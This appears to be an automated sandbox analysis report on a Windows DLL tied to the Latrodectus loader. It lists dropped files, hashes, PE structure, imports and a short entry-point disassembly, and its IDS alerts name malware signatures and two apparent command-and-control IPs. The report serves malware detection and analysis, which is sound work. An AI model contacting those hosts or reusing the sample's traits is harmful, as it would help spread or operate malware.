                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\boiz3.tmp

                                                              Download File
                                                              Process:C:\Windows\explorer.exe
                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):98304
                                                              Entropy (8bit):0.08235737944063153
                                                              Encrypted:false
                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\boiz3.tmp-shm

                                                              Download File
                                                              Process:C:\Windows\explorer.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):32768
                                                              Entropy (8bit):0.017262956703125623
                                                              Encrypted:false
                                                              SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                              MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                              SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                              SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                              SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                              Malicious:false
                                                              Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\ruikcu.tmp

                                                              Download File
                                                              Process:C:\Windows\explorer.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\uxax32.tmp

                                                              Download File
                                                              Process:C:\Windows\explorer.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:modified
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              Static File Info

                                                              General

                                                              File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                              Entropy (8bit):6.567244418107318
                                                              TrID:
                                                              • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                              • Win64 Executable (generic) (12005/4) 10.17%
                                                              • Generic Win/DOS Executable (2004/3) 1.70%
                                                              • DOS Executable Generic (2002/1) 1.70%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                              File name:wait.dll.dll
                                                              File size:2'151'936 bytes
                                                              MD5:50bd4ff60c931861e46c801a60f9e916
                                                              SHA1:13b14fb516fa726cc5fa9af17a2f93ff49449830
                                                              SHA256:f2170f7dc2f97434ef4514ed4272dc8792177038a085f248ba33f9259720afda
                                                              SHA512:a05c4097dca743d0d23a7e3a59fde91576e676a71b38d7daf744d6705ad19b651aac233cc53f0162ca1bbbfe2b8b0b83e58b3b7ac6e7ef66d9b3b43cbc0b48eb
                                                              SSDEEP:24576:JgWryG1z2cMbUhtEx+GRy1tWfxFDIHS4KGwt6nbmBdve1/JznfTWj+bXD:So0lolWfxeHlBwt6n+d21V7Wj+DD
                                                              TLSH:E8A58D297A9885B4D1FAC238C5678A4BF7B278168B31E3CF1256058E1F37BE1453F621
                                                              File Content Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$...............................&.......]...........................................................]...Q...............T.......T......

                                                              File Icon

                                                              Icon Hash:7ae282899bbab082

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x1800a7120
                                                              Entrypoint Section:.text
                                                              Digitally signed:true
                                                              Imagebase:0x180000000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF
                                                              Time Stamp:0x672BCA40 [Wed Nov 6 19:57:52 2024 UTC]
                                                              TLS Callbacks:0x800c9f80, 0x1
                                                              CLR (.Net) Version:
                                                              OS Version Major:6
                                                              OS Version Minor:0
                                                              File Version Major:6
                                                              File Version Minor:0
                                                              Subsystem Version Major:6
                                                              Subsystem Version Minor:0
                                                              Import Hash:151a05f8c4e108b7847025bc50b7e6b7

                                                              Authenticode Signature

                                                              Signature Valid:
                                                              Signature Issuer:
                                                              Signature Validation Error:
                                                              Error Number:
                                                              Not Before, Not After
                                                                Subject Chain
                                                                  Version:
                                                                  Thumbprint MD5:
                                                                  Thumbprint SHA-1:
                                                                  Thumbprint SHA-256:
                                                                  Serial:

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  dec eax
                                                                  mov dword ptr [esp+08h], ebx
                                                                  dec eax
                                                                  mov dword ptr [esp+10h], esi
                                                                  push edi
                                                                  dec eax
                                                                  sub esp, 20h
                                                                  dec ecx
                                                                  mov edi, eax
                                                                  mov ebx, edx
                                                                  dec eax
                                                                  mov esi, ecx
                                                                  cmp edx, 01h
                                                                  jne 00007F8A08FA0DF7h
                                                                  call 00007F8A08FA141Ch
                                                                  dec esp
                                                                  mov eax, edi
                                                                  mov edx, ebx
                                                                  dec eax
                                                                  mov ecx, esi
                                                                  dec eax
                                                                  mov ebx, dword ptr [esp+30h]
                                                                  dec eax
                                                                  mov esi, dword ptr [esp+38h]
                                                                  dec eax
                                                                  add esp, 20h
                                                                  pop edi
                                                                  jmp 00007F8A08FA0C68h
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  dec eax
                                                                  sub esp, 28h
                                                                  dec ebp
                                                                  mov eax, dword ptr [ecx+38h]
                                                                  dec eax
                                                                  mov ecx, edx
                                                                  dec ecx
                                                                  mov edx, ecx
                                                                  call 00007F8A08FA0E02h
                                                                  mov eax, 00000001h
                                                                  dec eax
                                                                  add esp, 28h
                                                                  ret
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  inc eax
                                                                  push ebx
                                                                  inc ebp
                                                                  mov ebx, dword ptr [eax]
                                                                  dec eax
                                                                  mov ebx, edx
                                                                  inc ecx
                                                                  and ebx, FFFFFFF8h
                                                                  dec esp
                                                                  mov ecx, ecx
                                                                  inc ecx
                                                                  test byte ptr [eax], 00000004h
                                                                  dec esp
                                                                  mov edx, ecx
                                                                  je 00007F8A08FA0E05h
                                                                  inc ecx
                                                                  mov eax, dword ptr [eax+08h]
                                                                  dec ebp
                                                                  arpl word ptr [eax+04h], dx
                                                                  neg eax
                                                                  dec esp
                                                                  add edx, ecx
                                                                  dec eax
                                                                  arpl ax, cx
                                                                  dec esp
                                                                  and edx, ecx
                                                                  dec ecx
                                                                  arpl bx, ax
                                                                  dec edx
                                                                  mov edx, dword ptr [eax+edx]
                                                                  dec eax
                                                                  mov eax, dword ptr [ebx+10h]
                                                                  mov ecx, dword ptr [eax+08h]
                                                                  dec eax
                                                                  add ecx, dword ptr [ebx+08h]
                                                                  test byte ptr [ecx+03h], 0000000Fh
                                                                  je 00007F8A08FA0DFCh
                                                                  movzx eax, byte ptr [ecx+03h]
                                                                  and eax, FFFFFFF0h
                                                                  dec esp
                                                                  add ecx, eax
                                                                  dec esp
                                                                  xor ecx, edx
                                                                  dec ecx
                                                                  mov ecx, ecx
                                                                  pop ebx
                                                                  jmp 00007F8A08F9FE5Ch
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  dec eax
                                                                  mov eax, esp
                                                                  dec eax
                                                                  mov dword ptr [eax+08h], ebx
                                                                  dec eax
                                                                  mov dword ptr [eax+10h], ebp

                                                                  Rich Headers

                                                                  Programming Language:
                                                                  • [ C ] VS2015 UPD3.1 build 24215
                                                                  • [C++] VS2015 UPD3.1 build 24215
                                                                  • [EXP] VS2015 UPD3.1 build 24215
                                                                  • [RES] VS2015 UPD3 build 24213
                                                                  • [LNK] VS2015 UPD3.1 build 24215

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x1ab1800x50.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1ab1d00x118.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x20d0000x3e2cc.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1fd0000xdfd4.pdata
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x1d02000x4c88.data
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x24c0000x2cdc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x16ff500x70.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x16ffc00x28.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1403900x94.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x1310000x900.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x1aafa80x60.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x12fc720x12fe00cfc1e87d2c63283c44e833408d29ea7fFalse0.4565355370732209data6.419366715731773IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x1310000x7c0fe0x7c200a4954081c74d000384bc2efc82edd752False0.3351959812437059data4.700482926080951IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0x1ae0000x4e69c0x11c00fabab7297287432bf4e655ca0e30ce47False0.1491114656690141data4.898674177702867IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .pdata0x1fd0000xdfd40xe000f990ff2d079ca6021e5f6940d93925f4False0.49951171875data6.0505498906745006IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .didat0x20b0000x500x200e9e220e758f652c0b968858880849ef1False0.076171875data0.6238134388695525IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .tls0x20c0000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0x20d0000x3e2cc0x3e400adf6a36daa462b6fd89b22a9ce52970aFalse0.9884930346385542data7.99706252036296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x24c0000x2cdc0x2e00c027109eb5c0fa1a20c92ead363b39c0False0.26069972826086957data5.458036868609607IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  REGISTRY0x20d2000x268ASCII text, with CRLF line terminatorsEnglishUnited States0.45616883116883117
                                                                  REGISTRY0x20d4680x1f3ASCII text, with very long lines (318), with CRLF line terminatorsEnglishUnited States0.42685370741482964
                                                                  REGISTRY0x20d65c0x2a6ASCII text, with CRLF line terminatorsEnglishUnited States0.4218289085545723
                                                                  RT_MANIFEST0x20d9040x289ASCII text, with CRLF line terminatorsEnglishUnited States0.5100154083204931
                                                                  RT_VERSION0x20db900x394OpenPGP Secret KeyEnglishUnited States0.43777292576419213
                                                                  RT_VXD0x20df240x3d3a6data0.998197695282906

                                                                  Imports

                                                                  DLLImport
                                                                  RPCRT4.dllRpcRevertToSelfEx, RpcImpersonateClient
                                                                  WTSAPI32.dllWTSUnRegisterSessionNotification, WTSQuerySessionInformationW, WTSRegisterSessionNotification, WTSFreeMemory, WTSEnumerateSessionsW, WTSQueryUserToken
                                                                  SHLWAPI.dllStrStrIW, SHDeleteValueW, SHGetValueW, PathFindFileNameW, PathAddBackslashW
                                                                  USERENV.dllDestroyEnvironmentBlock, CreateEnvironmentBlock
                                                                  SETUPAPI.dllSetupDiOpenDevRegKey, CM_Get_DevNode_Status, SetupDiGetDeviceInstanceIdW, SetupDiGetDeviceRegistryPropertyW, SetupDiGetClassDevsW, SetupDiDestroyDeviceInfoList, SetupDiEnumDeviceInfo
                                                                  KERNEL32.dllGetSystemDirectoryW, GetLastError, CloseHandle, GetProcAddress, LocalFree, VerSetConditionMask, GetModuleHandleW, FreeLibrary, VerifyVersionInfoW, LoadLibraryExW, WTSGetActiveConsoleSessionId, lstrcmpiW, SizeofResource, GetFileSizeEx, EnterCriticalSection, GetCurrentProcess, ReleaseSemaphore, WriteFile, ExpandEnvironmentStringsW, LeaveCriticalSection, CreateMutexW, InitializeCriticalSectionEx, WaitForMultipleObjectsEx, WaitForSingleObject, GetCurrentThreadId, ReleaseMutex, CreateToolhelp32Snapshot, MultiByteToWideChar, Process32NextW, OutputDebugStringW, SetEvent, WaitForSingleObjectEx, QueryPerformanceFrequency, Process32FirstW, RaiseException, LoadResource, FindResourceW, DecodePointer, DeleteCriticalSection, WideCharToMultiByte, VirtualAllocExNuma, CreateSemaphoreA, CreateEventA, QueryPerformanceCounter, GetProcessTimes, HeapFree, WaitForMultipleObjects, OpenEventW, HeapSize, CreateEventW, Sleep, lstrcatW, HeapReAlloc, ResetEvent, HeapAlloc, HeapDestroy, GetProcessHeap, DuplicateHandle, GetModuleHandleA, GetCurrentThread, CreateThread, GetTickCount, DeviceIoControl, OpenMutexW, GetCurrentProcessId, ProcessIdToSessionId, GetSystemInfo, GetEnvironmentVariableA, CompareFileTime, FindClose, FindFirstFileW, GetFileAttributesW, GetFileSize, GetLogicalProcessorInformation, LoadLibraryW, FormatMessageW, GetComputerNameExW, GetVersionExW, LockResource, FindResourceExW, TerminateProcess, GetLocaleInfoW, CreateFileW, LocalAlloc, GetModuleFileNameW, GetFullPathNameW, SetLastError, GetModuleFileNameA, RtlPcToFileHeader, RtlUnwindEx, VirtualAlloc, SetStdHandle, GetFileType, GetTimeZoneInformation, ExitProcess, GetModuleHandleExW, ExitThread, FreeLibraryAndExitThread, GetStdHandle, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, ReadFile, GetConsoleMode, ReadConsoleW, GetConsoleCP, FindFirstFileExW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, FlushFileBuffers, WriteConsoleW, SignalObjectAndWait, SwitchToThread, SetThreadPriority, GetThreadPriority, CreateTimerQueueTimer, InterlockedFlushSList, InterlockedPushEntrySList, AreFileApisANSI, MoveFileExW, SetFilePointerEx, SetEndOfFile, RemoveDirectoryW, DeleteFileW, CreateDirectoryW, FormatMessageA, SystemTimeToFileTime, CreateWaitableTimerA, ResumeThread, SetWaitableTimer, OpenEventA, GetCPInfo, LCMapStringW, CompareStringW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, EncodePointer, TryEnterCriticalSection, GetStringTypeW, GetStartupInfoW, IsDebuggerPresent, InitializeSListHead, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, LoadLibraryExA, VirtualQuery, VirtualProtect, ChangeTimerQueueTimer, DeleteTimerQueueTimer, GetNumaHighestNodeNumber, GetProcessAffinityMask, SetThreadAffinityMask, RegisterWaitForSingleObject, UnregisterWait, GetThreadTimes, VirtualFree, InterlockedPopEntrySList, QueryDepthSList, UnregisterWaitEx, CreateTimerQueue, FindNextFileW
                                                                  ADVAPI32.dllRegQueryValueExW, RegDeleteValueW, CreateProcessAsUserW, RegOpenKeyExW, RegDeleteKeyW, RegCloseKey, RegEnumValueW, RegSetValueExW, RegEnumKeyExW, TraceMessage, RegCreateKeyExW, RegQueryInfoKeyW, ConvertStringSecurityDescriptorToSecurityDescriptorW, UnregisterTraceGuids, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, RegNotifyChangeKeyValue, OpenThreadToken, GetTokenInformation, GetTraceLoggerHandle, GetTraceEnableFlags, GetTraceEnableLevel, RegisterTraceGuidsW
                                                                  ole32.dllCoCreateInstanceEx, CoSetProxyBlanket, CoUninitialize, CoInitialize, CoInitializeEx, CoResumeClassObjects, CoRegisterClassObject, CoAddRefServerProcess, CoRevokeClassObject, CoCreateInstance, StringFromGUID2, CoTaskMemRealloc, CoTaskMemFree, CoTaskMemAlloc, CoInitializeSecurity
                                                                  OLEAUT32.dllVariantInit, VarUI4FromStr, SysFreeString, SysAllocString, VariantClear
                                                                  bcrypt.dllBCryptHashData, BCryptFinishHash, BCryptDestroyHash, BCryptGenRandom, BCryptCloseAlgorithmProvider, BCryptSetProperty, BCryptGenerateSymmetricKey, BCryptCreateHash, BCryptVerifySignature, BCryptDestroyKey, BCryptImportKeyPair, BCryptExportKey, BCryptDecrypt, BCryptOpenAlgorithmProvider, BCryptGetProperty, BCryptEncrypt
                                                                  CRYPT32.dllCryptDecodeObjectEx, CryptStringToBinaryA, CryptImportPublicKeyInfoEx2
                                                                  WS2_32.dllsocket, connect, WSAStartup, WSACleanup, WSAGetLastError, getaddrinfo, freeaddrinfo, inet_ntop, closesocket, shutdown, send, recv, ioctlsocket, WSAPoll
                                                                  IPHLPAPI.DLLGetAdaptersAddresses

                                                                  Exports

                                                                  NameOrdinalAddress
                                                                  Jump10x180043c00

                                                                  Possible Origin

                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States

                                                                  Network Behavior

                                                                  Suricata IDS Alerts

                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-12-02T18:44:44.527662+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549907172.67.217.190443TCP
                                                                  2024-12-02T18:44:44.564697+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.549907172.67.217.190443TCP
                                                                  2024-12-02T18:44:47.826069+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549916172.67.217.190443TCP
                                                                  2024-12-02T18:44:48.595493+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.549916172.67.217.190443TCP
                                                                  2024-12-02T18:44:50.122592+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549922172.67.217.190443TCP
                                                                  2024-12-02T18:44:50.916155+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.549922172.67.217.190443TCP
                                                                  2024-12-02T18:44:52.316275+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549928172.67.217.190443TCP
                                                                  2024-12-02T18:44:53.062424+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.549928172.67.217.190443TCP
                                                                  2024-12-02T18:44:54.395713+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549934172.67.217.190443TCP
                                                                  2024-12-02T18:44:56.200694+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549934172.67.217.190443TCP
                                                                  2024-12-02T18:44:56.200694+01002018052ET MALWARE Zbot Generic URI/Header Struct .bin1192.168.2.549934172.67.217.190443TCP
                                                                  2024-12-02T18:44:57.622228+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549941172.67.217.190443TCP
                                                                  2024-12-02T18:44:59.451375+01002018052ET MALWARE Zbot Generic URI/Header Struct .bin1192.168.2.549941172.67.217.190443TCP
                                                                  2024-12-02T18:45:00.747774+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549950172.67.217.190443TCP
                                                                  2024-12-02T18:45:02.909131+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549950172.67.217.190443TCP
                                                                  2024-12-02T18:45:02.909131+01002018052ET MALWARE Zbot Generic URI/Header Struct .bin1192.168.2.549950172.67.217.190443TCP
                                                                  2024-12-02T18:45:06.326721+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549962172.67.217.190443TCP
                                                                  2024-12-02T18:45:07.063591+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.549962172.67.217.190443TCP
                                                                  2024-12-02T18:45:08.104067+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549968172.67.217.190443TCP
                                                                  2024-12-02T18:45:09.730001+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549972104.21.68.89443TCP
                                                                  2024-12-02T18:45:12.273213+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.549972104.21.68.89443TCP
                                                                  2024-12-02T18:45:13.692035+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549980104.21.68.89443TCP
                                                                  2024-12-02T18:45:15.320865+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.549980104.21.68.89443TCP
                                                                  2024-12-02T18:45:16.944086+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549986104.21.68.89443TCP
                                                                  2024-12-02T18:45:18.682230+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.549986104.21.68.89443TCP
                                                                  2024-12-02T18:45:20.032123+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549995104.21.68.89443TCP
                                                                  2024-12-02T18:45:21.710515+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.549995104.21.68.89443TCP
                                                                  2024-12-02T18:45:23.028620+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549999104.21.68.89443TCP
                                                                  2024-12-02T18:45:23.030742+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.549999104.21.68.89443TCP
                                                                  2024-12-02T18:45:25.999791+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550000104.21.68.89443TCP
                                                                  2024-12-02T18:45:27.598658+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550000104.21.68.89443TCP
                                                                  2024-12-02T18:45:29.818885+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550001104.21.68.89443TCP
                                                                  2024-12-02T18:45:31.442221+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550001104.21.68.89443TCP
                                                                  2024-12-02T18:45:32.842132+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550002104.21.68.89443TCP
                                                                  2024-12-02T18:45:34.469924+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550002104.21.68.89443TCP
                                                                  2024-12-02T18:45:36.271883+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550003104.21.68.89443TCP
                                                                  2024-12-02T18:45:37.896126+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550003104.21.68.89443TCP
                                                                  2024-12-02T18:45:39.471963+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550004104.21.68.89443TCP
                                                                  2024-12-02T18:45:41.079743+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550004104.21.68.89443TCP
                                                                  2024-12-02T18:45:42.253111+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550005104.21.68.89443TCP
                                                                  2024-12-02T18:45:43.549824+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550006172.67.217.190443TCP
                                                                  2024-12-02T18:45:44.395556+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550006172.67.217.190443TCP
                                                                  2024-12-02T18:45:45.823624+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550007172.67.217.190443TCP
                                                                  2024-12-02T18:45:46.753159+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550007172.67.217.190443TCP
                                                                  2024-12-02T18:45:48.023397+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550008172.67.217.190443TCP
                                                                  2024-12-02T18:45:48.761904+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550008172.67.217.190443TCP
                                                                  2024-12-02T18:45:50.330478+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550009172.67.217.190443TCP
                                                                  2024-12-02T18:45:51.126064+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550009172.67.217.190443TCP
                                                                  2024-12-02T18:45:52.440877+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550010172.67.217.190443TCP
                                                                  2024-12-02T18:45:53.206186+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550010172.67.217.190443TCP
                                                                  2024-12-02T18:45:54.546398+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550011172.67.217.190443TCP
                                                                  2024-12-02T18:45:55.328247+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550011172.67.217.190443TCP
                                                                  2024-12-02T18:45:56.708800+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550012172.67.217.190443TCP
                                                                  2024-12-02T18:45:57.918742+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550012172.67.217.190443TCP
                                                                  2024-12-02T18:45:59.326069+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550013172.67.217.190443TCP
                                                                  2024-12-02T18:46:00.102210+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550013172.67.217.190443TCP
                                                                  2024-12-02T18:46:01.494128+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550014172.67.217.190443TCP
                                                                  2024-12-02T18:46:02.173598+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550014172.67.217.190443TCP
                                                                  2024-12-02T18:46:04.165437+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550015172.67.217.190443TCP
                                                                  2024-12-02T18:46:04.861845+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.550015172.67.217.190443TCP
                                                                  2024-12-02T18:46:06.370230+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.550016172.67.217.190443TCP
